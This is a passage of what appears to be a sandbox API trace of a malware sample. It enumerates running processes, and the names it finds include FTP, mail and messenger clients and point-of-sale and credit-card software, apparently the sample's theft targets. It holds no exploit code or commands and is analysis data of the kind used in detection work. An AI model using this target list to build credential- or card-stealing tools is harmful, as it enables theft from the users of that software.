hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.863] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.865] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.867] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.869] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.870] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.871] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0184.873] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0184.874] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.876] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0184.878] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.879] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0184.881] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0184.882] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0184.924] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0184.926] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0184.928] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0184.930] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.931] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.934] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0184.935] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.937] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0184.938] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.940] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0184.941] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0184.944] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0184.945] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0184.947] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0184.949] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0184.951] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0184.952] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0184.954] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0184.955] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0184.957] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0184.958] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0185.008] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0185.010] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0185.012] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0185.013] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0185.016] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0185.018] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0185.019] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0185.021] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0185.022] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0185.024] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0185.026] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0185.028] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0185.030] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0185.032] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0185.034] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0185.036] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0185.038] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0185.040] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0185.042] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0185.156] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0185.182] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0185.184] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0185.186] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0185.189] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0185.191] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0185.193] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0185.195] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0185.197] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0185.199] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0185.200] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0185.204] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0185.206] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0185.209] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0185.212] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0185.214] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0185.217] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0185.265] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0185.268] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0185.271] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0185.274] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0185.278] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0185.280] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0185.282] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0185.288] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0185.291] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0185.293] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0185.295] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0185.298] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, 